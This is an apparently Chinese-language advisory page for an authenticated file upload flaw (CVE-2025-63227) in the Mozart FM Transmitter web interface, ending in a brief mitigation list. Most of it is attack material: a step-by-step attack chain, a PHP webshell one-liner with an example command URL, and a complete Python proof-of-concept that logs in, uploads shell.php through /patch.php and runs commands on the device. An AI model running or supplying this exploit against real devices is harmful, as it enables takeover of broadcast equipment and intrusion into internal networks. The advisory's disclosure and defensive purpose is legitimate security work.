CVE-2025-63227 | Mozart FM Transmitter 无限制文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-63227

漏洞类型

无限制文件上传

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Mozart FM Transmitter Web Management Interface (WEBMOZZI-00287)

漏洞概述

CVE-2025-63227是Mozart FM Transmitter网络管理界面中存在的一个高危安全漏洞，CVSS评分达到7.2分。该漏洞影响WEBMOZZI-00287版本的设备，允许具有管理员权限的攻击者通过/patch.php端点上传播意文件，包括PHP webshell等恶意代码。被上传的文件会被存储在/patch/目录下，攻击者随后可以通过访问这些文件在服务器上执行任意系统命令，从而可能导致完整的系统入侵和数据泄露。该漏洞的利用需要认证为管理员用户，但一旦成功利用，攻击者可以完全控制目标系统，执行远程代码执行攻击，获取敏感数据或进一步渗透内网。由于Mozart FM Transmitter通常用于广播和电信行业，漏洞的利用可能对广播服务的连续性和数据安全造成严重影响。攻击者还可以利用该漏洞作为内网横向移动的跳板，对组织内部的其他系统发起进一步攻击。

技术细节

该漏洞存在于Mozart FM Transmitter设备的Web管理界面中，具体位于/patch.php端点。漏洞的根本原因在于该端点缺少对用户上传文件的类型、内容和扩展名的有效验证机制。攻击者使用管理员账号登录后，可以直接向/patch.php发送HTTP POST请求，上传任意类型的文件，包括但不限于.php文件。上传的文件会被自动保存在服务器的/patch/目录下，并且文件保持原名或被重命名为可预测的名称。由于.php文件能够在Web服务器上执行，攻击者可以上传包含恶意PHP代码的webshell文件，如<?php system($_GET['cmd']); ?>，然后通过HTTP请求访问该文件并传入cmd参数来执行系统命令。例如，攻击者可以上传一个名为shell.php的文件，然后通过访问http://target/patch/shell.php?cmd=whoami来执行命令。这种文件上传漏洞允许攻击者绕过正常的Web应用认证和授权机制，直接在服务器上执行任意代码，实现远程代码执行(RCE)。攻击者通常会利用此漏洞获取服务器的持久化访问权限，安装后门程序，窃取敏感数据或将其作为进一步攻击的跳板。

攻击链分析

STEP 1

信息收集

攻击者识别目标为Mozart FM Transmitter设备，确认版本为WEBMOZZI-00287，并探测Web管理界面的登录入口

STEP 2

认证获取

攻击者使用管理员账号密码登录Web管理界面，获取有效的会话cookie和访问权限

STEP 3

恶意文件构造

攻击者构造包含PHP代码的webshell文件，如<?php system($_GET['cmd']); ?>，用于在服务器上执行系统命令

STEP 4

文件上传

攻击者通过HTTP POST请求向/patch.php端点上传webshell文件，服务器将其保存在/patch/目录且未进行安全验证

STEP 5

远程代码执行

攻击者通过HTTP请求访问上传的webshell文件，并使用cmd参数传递系统命令，实现远程代码执行(RCE)

STEP 6

持久化控制

攻击者利用获得的服务器访问权限，安装后门、窃取数据或进行内网横向移动，实现对系统的持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63227 PoC - Mozart FM Transmitter Unrestricted File Upload
# Target: Mozart FM Transmitter WEBMOZZI-00287
# Endpoint: /patch.php
# Authentication: Required (Admin privileges)

def upload_webshell(target_url, username, password):
    """
    Upload a PHP webshell to the target server via the vulnerable /patch.php endpoint.
    
    Args:
        target_url: Base URL of the target (e.g., http://192.168.1.100)
        username: Admin username
        password: Admin password
    
    Returns:
        bool: True if upload successful, False otherwise
    """
    
    # Step 1: Authenticate to get session
    login_url = f"{target_url}/login.php"
    session = requests.Session()
    
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        login_response = session.post(login_url, data=login_data, timeout=10)
        
        # Step 2: Upload malicious PHP file via /patch.php
        upload_url = f"{target_url}/patch.php"
        
        # PHP webshell payload
        webshell_content = "<?php system($_GET['cmd']); ?>"
        
        files = {
            'file': ('shell.php', webshell_content, 'application/x-php')
        }
        
        upload_response = session.post(upload_url, files=files, timeout=10)
        
        # Step 3: Verify upload and test RCE
        shell_url = f"{target_url}/patch/shell.php"
        test_response = session.get(f"{shell_url}?cmd=whoami", timeout=10)
        
        if test_response.status_code == 200:
            print(f"[+] SUCCESS: Webshell uploaded and executable!")
            print(f"[+] Shell URL: {shell_url}")
            print(f"[+] Command output: {test_response.text}")
            return True
        else:
            print(f"[-] Upload may have failed. Status: {test_response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def main():
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://192.168.1.100 admin password")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Authenticating as: {user}")
    upload_webshell(target, user, passwd)

if __name__ == "__main__":
    main()

影响范围

Mozart FM Transmitter WEBMOZZI-00287

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1) 限制Web管理界面的访问，仅允许受信任的IP地址访问；2) 使用网络层访问控制，阻止未授权用户访问/patch.php端点；3) 定期检查/patch/目录，删除任何可疑文件；4) 监控Web服务器的访问日志，关注异常的文件上传和访问模式；5) 考虑使用网络隔离技术，将FM Transmitter设备部署在独立的网络区域；6) 启用入侵检测/防御系统(IDS/IPS)，实时监控和阻断潜在的攻击行为。